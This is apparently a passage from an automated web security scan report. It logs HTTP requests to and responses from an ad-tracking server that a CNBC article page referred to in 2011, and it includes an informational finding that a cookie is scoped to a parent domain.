GET /I10985/b3/0/3/1008211/174739392.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_8E2i="MLsXtSMNZzhvJZH0ecXcxPALrEtuUCF+EhmSrU9X53YJybh8eM9OR5om4StALLEldrjeS5xM1SF6IV/GkJdNcmYgL2c8DIkhMma7ijDdOQtDOR/YNpbDHixkZQD7sCDZSgJR/jkpsLCifBQ10eEu+lspgfSYGHACY8nJhZ5Y0x4JtT7ZjoOaKJDMSomBnLjVzZQq7ocv/wqjjd0mY82cC0LmbM49cBkQFTH3NtFyXhLIJuvvnn+3z1ZZAKOcMi/3Lss4bfgS1FkG2vBKSNr6EthRBkWZgyGlznk2WTm9WJnoKZZ6jw69nBZQ9Qs/1kMNvb5ldHB/NaLF84O2DinmtF0dCqdXyKvYuTjdjsVbak/6P6HZH5w9ZyEyhaAzAvuxYENdFnjwCvikpoDe0v0oWQA2WpzwKbUt+qMfYJ9NEmTwsgMYLJOUb63Pf//fErOtm/dhr/B9o4RoeUWaKv8SirWkIPD6XkHvZudoYVTEDGsSyxt01RkL5WHAi4J21AnV5sHB7nXsjjNBbjQW0bZhAd6ccYCVcUEVyCEEs/SasWBDdSZ/FDM7PoddW4fFPn29PiccRtdiajrdErm7/jY+HZ+OmclxyPTiXCjj5TxRyCs9rtGq5v1EjX5ybTqX0pz6PnYFwiAvVa3aPlwTpxm+9NSa012jMC+6K8x6lA4HtaONNMZwHRrNe4bNsgnw74njf6ZX3Kj6RkidHYCnBt5p6I5jL272yQ1wEc2JKmS+wZ/LuIO16/HvwJnBlTTUYVP2lVnIIcuHOMo0oKNtqS+VLgSLE1uknMk3e1TF8B/wB1vV1FuoTmdVCQT8DMfjrziJoAI/Vr9P1NHT6/RKsuakN1pOdrNCmAgY7f7euGt4mHzLBE7UtnikZ873oD3GetwUg/P/aJhM/HUwp2QMyuWCZ/L8un/rSXgv8KTitHbwDb6F2tyXgdT7FF8n7JigdjoPb2IpBRFms7FPMUjH8PO+TeAJ8fHRUsp1V7Urb7MTEGSycDGZkjv/WuRTDYLb4ESjipvb6qyYMkOfv1NV/y+tYxQ2nFPhHUYS4/IESm8oNCprBvoEA4vdWNDOPCqD9ygq9Untfei5hbl/b+KqPneB3bMTUpIWRzoLg5oIz1nYe3N2YuT8M5YqZScAXqZoFa15dqpdUREBzGm096GyaQJDR20VrGh3QTSBOs1UcONh+4+iwIeTD5z1y7p3qLniYmUiNEv69UadjjvcqC9FhHQJ+mTPIPXrNrRp7mQtSfcxPhPWDKeMMEjR46kMaq/e0YLh0a7Rcc2BuoTBuQQ7b7mn1byvyFDhfMwQKkpXYwRxg8GYj8OglQhfSSg4eOJhdD1iQevwFXmqNGOl2rrbFiTijNd3KD+WuQ=="; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8r/x9aZAzFnepwZbEAIrfBzwu6EE8765sab61E9XW3IUyswTDPhy0LqBSNxCIHMpLEfG++73jkHJpg7Oz8ZDHGqRushnLHAEpFVpmxyDJY1KqlF/Ai8Md6jGPzOhDQMwAtMWuZtluoPvJjt1/wIlffmL+z1yR/GPQqbpTCublp+D1SvzQTV/hOlu9q+R03c4Garq2nu4BnqmL+yUAqBd8D2AZVKLKbRtlSE9+YQQ+3wqeoxaJQkKPVRs7ltrGtzf+7jt7X19kdDOvE6KLmqm+rnv8cusKMVrNA9oqPsd8pvswVWNhgIS48okikmUltNzTcsYRjus52iSvd/QpCk+RjPzAd8l+MN8U+npiZlI0wqUHKdj9CslVR255/aHYtYrJ5hBLimKOZrCOtBngeGHhEbEHQq+CvzQWR2D3cPO+WV0qySWAvv+22X1D18yxRK/+yihd3/lzV8SWQCt5+OYCKs/+5yiKloLpjbaFVAPq6bla3O6dOxDP0TD1bTF6CAtoDY6BqIwtW0Ll0KDwtr7fM0GSnFVRXankZsL9cRpI/sGWAzcxsKJ9ErfXac9i6vcf/MJUrUglOxHNaigAgZe4zshNs2zQclBUL0sXwiXU4YfpRM8lxc5wChjMUiPkmy4V60QDoA3YyM9dvuntnpGZmlZSyrEGz/5/iVECbniuB4BgRZWY39l0vBThulFTzsyjQw+iFKYBBIh/v29XahXFEiX7bOz9xgtzWLxVgEwbWQZgVVB6rsX7v1h0+7lnuLgtClkpPEjNjtH+dyG/NPxqHn6hsdAZ+lOy5RkjpaVtI1SV1Sw8ZjJ3TB8jkBny9aO31s1iPfNDKWXBAzZO3fmDhbgrTKzIThMrnOGb6m8x3/4WDH5QlCvax4Zxl8zn3aNjdKswkIerfq1d7KOHH3P3VOShJL6XH8jMa4CwNGxqEOHLt4tjK7zYqcCey6NmR5SMulqu7tEwldGignbrZx4egQvPuxi24QgjrGo4LUhbTw8GEwsBY3j7HkuDbwCqFg0bgoosy49BoEK7NSxhVC8e1q6ICmLQIA4bi1aYGmWGOaJ9HPtvCxCq/k5seAoyejo91bgZXe51PMzoi+IB5eZFzWUnTDmR6390tnMeOXnDv/5agPp8MZIDCBKWEmTAt7Qoo4AqX6pcqe5tRvAqTkBbNpxB68F051ihd31MAawVI1KqKiw2f0FjIZ8sIbWqtbaUV/UuTkcrFG1gk2WMVQ5rlNWzQaGjvdafLGWJnoN1IaQy/3v+6Bym4HdkLQMDv4UFsihhhbmYHaGivBdNLDQ+v83lce1WqNT3tRbbnMEOOxZ4DujYx5HjYcUvl3lRf1JVPOnL5JnqRHU7/xQMSEitGCm+CVUy9X4wSfNOgJydw4txSXD33zctEoDvs0Sk5ZTAmCy+Yl3ZrBcfvyIuWWBw5c09txjbo+zpeHeXob6DO0lEP75W2fyeORCjm3z0Gz8ps08RRcQXXOT0s1KgRCyz13n8O2T8/848xHA14DoiHX8fEof/XR2z3h0gQv/xqAL+ki9xOBEQJAn6W/hrgjSv+gWk2gft+cK2SHWBh2qLMUSW3AlEN04aw4TM0riArCx81VpWYD5aBv53odUAL4argdV0/bnBw0bbNqOOMKvxh1J7bzE/ANaNT+pDLc0KiQH0T/rgjwb5k741jJT3hXDBk9w/GxvyvbMp7+kswOkdSxtex01062wYIyL5aqx0ZMcRKvASY8sKHtYI5T30DBFTEce3ArEXA=="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzPsfMoDyEru/fEoGzjWn34t0SereqKoyYxPJ+Rd63X2lVVT6vqpyfiQt1ZUaFhDJywmuN0xKn/PVO6q/9yxI5Dg3jlaU1c81sJz+2RW+lX8QueIgg4JxkVaxOtRmUFCPaUltH3yy2K+/mE8hwz7G6k3Go8eEvK1gYs0qSNpifAHNhpw5IAYPffBz0BwI0Shh0kOnWKsPZG2jo6RoHQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjkGXQ0oLjsSKY/4HossPOTKgOG0VtDwsiIIhSOP7byyJpLCrXXOsLPkZ6Z2LaGx1SrMuvvfXos1Y4bG6iTztIytZ+4oloPzFDWLZalCAK9m0inSch7wHrKI2jDUVJMyl3syAq1j4FvExFWoTXBQT1YB2yKMYnbjVCCN585UoNoYNGZauHeS+e3SNHvhCIOr3FpcNYlbfpi0IF12pvSN0XZoFA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 19:03:47 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 19:03:46 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.129. http://pix04.revsci.net/I10985/b3/0/3/1008211/178674175.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/178674175.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pSfuKp6homnlrYgI1lp22zIsyNkdhnNKrDXFyf2BIJjwRtF66AS5NH6WeHi66QiBAbzuCfcTOvbS7pGUjONH+30I2ZuPpFFcJfLwMGBPKQaQeWilp3IbaUy4YHwwCQ54z6HyEJjii4lNh+z72sqS8+sc4nxiV6/ef0ICmGx5g7xCy4pMdlCvlXW9zmpmAaRe4AnwFVp3janDXi1hx/1AwyItq6cJ/DahrGn/8I2DqZtPPL4L8ZvJCkkBlSEPLmp8X89FhkTc3FX0EkoMV5wb2GKZrUAz9ZSnPla73H20hG6GDVAIlzGqD+HVKrdZtLEidm93t8ba3/QY0qP1/RHB/bhABQqsC6PjuYiHsXCMVouXiWpLwAJncCH8Zz+R5sVSYoe/Ie4GnZHI4uL0HiW7q7XNODWxC8Rkr+FiCdZrx2A7gJRW8ynaYBSuVYj/QxeB+f04; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:48:13 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/178674175.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; 